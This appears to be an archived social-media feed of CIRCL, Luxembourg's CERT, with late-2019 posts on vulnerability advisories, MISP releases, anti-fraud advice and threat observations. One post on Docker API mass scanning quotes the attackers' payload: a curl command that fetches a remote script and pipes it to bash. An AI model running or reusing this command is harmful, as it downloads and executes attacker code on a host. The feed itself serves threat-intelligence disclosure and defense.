CIRCL (Twitter feed) @circl@mastodon.opencloud.lu
- Web site:
- https://www.circl.lu/
- Twitter:
- https://twitter.com/circl_lu
CIRCL is the #CERT (Computer Emergency Response Team) for the private sector, communes and non-governmental entities in #Luxembourg.
Joined Nov 2019
"phpMyAdmin before 4.9.2 does not escape certain Git information, related to libraries/classes/Display/GitRevision.php and libraries/classes/Footer.php."
Update On MISP - Alex Dulaunoy @adulau @MITREattack
https://youtu.be/oL8jmH1f7M8
"This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions."
#Dontbeamule @Europol @EC3Europol @EBFeu
Niemals Ihre Kontoverbindung an jemanden weiter geben sofern Sie die Person nicht kennen
Zugangsdaten für Ihr #OnlineBanking/Kartendaten nicht weiter geben
Vorsicht bei unverlangten Angeboten, die leichtes Geld versprechenpic.twitter.com/sRTs7Hu22X
MISP 2.4.119 has been released with many improvements in the API, a security fix for CVE-2019-19379 and various changes. New MISP expansion, import and export modules were introduced. #ThreatIntel #CTI #CyberSecurity
https://www.misp-project.org/2019/12/04/MISP.2.4.119.released …pic.twitter.com/9A0mz8kEz7
"D-Link DAP-1860 devices before v1.04b03 Beta allow access to administrator functions without authentication via the HNAP_AUTH header timestamp value."
#Phishing winter is here but Santa has free tools for you!
If you receive a suspicious message you can check the link via
https://circl.lu/urlabuse/ and send it to @circl_lu via info@circl.lu
We have a new galaxy and object to express dark patterns in MISP. A good example of using MISP to model and share new threats targeting users.
Thanks to @gallypette (@circl_lu) and @b0rce (@uni_lu)
https://www.misp-project.org/galaxy.html#_dark_patterns …pic.twitter.com/URHrF1Maei
We have an ongoing MISP User Experience Survey together with the @uni_lu (@b0rce) - Don't hesitate to participate, it will help us to improve the UX experience of MISP. @circl_lu
https://www.misp-project.org/ux-survey
I've just written an little howto for unpacking #Clop
https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f …
#Malware #Ransomware
If you are wondering why our
http://cve.circl.lu (@cve_search) is sometime a bit slow, we have a significant number of queries per second. We strongly recommend to install your own cve-search instance. Everything is open source and the full data dump is also available.pic.twitter.com/WmA4itAe5g
If you have your own and local cve-search server. It's faster and you are not leaking queries or searches about your findings to third-parties (even if it's CIRCL in this case ;-).
Yes, @circl_lu's BGP Ranking tool is one of our favorite resources.
A great use case for our @hns_platform #CyberRange. It is always a pleasure to work with @circl_lu and @ceis_strat.
https://twitter.com/bluecyforce/status/1200455107965534209 …
This week, we hosted a workshop for the #ENFORCEproject with @ceis_strat and @circl_lu. Our @hns_platform #CyberRange was providing a virtual infrastructure with multiple @MISPProject, @d4_project and AIL framework instances. #LawEnforcement #DFIR #ThreatIntel #DGHome
Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.
These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4
http://ix.io/1XQa | bash;'",
#threatintelpic.twitter.com/vxszV5SF1o
During the network traffic analysis workshop of a recent network telescope dataset, we saw that Mirai (and others) are more frequently scanning TCP port 26. Mirai variants are still actively relying on setting the ISN with the destination IP address (as seen in the graph below).pic.twitter.com/tpu8LSUoNw
"An Improper Input Validation vulnerability in the SSL VPN portal of FortiOS versions 6.2.1 and below, and 6.0.6 and below may allow an unauthenticated remote attacker to crash the SSL VPN service by sending a crafted POST request."
"Dell EMC Storage Monitoring and Reporting version 4.3.1 contains a Java RMI Deserialization of Untrusted Data vulnerability."
RHSA-2019:3958: Critical: Red Hat Security Advisory: Red Hat Ansible Tower 3.6.1-1 - EL7 Container https://red.ht/35zag8M
- Web site:
- https://www.circl.lu/
- Twitter:
- https://twitter.com/circl_lu
CIRCL is the #CERT (Computer Emergency Response Team) for the private sector, communes and non-governmental entities in #Luxembourg.
Joined Nov 2019
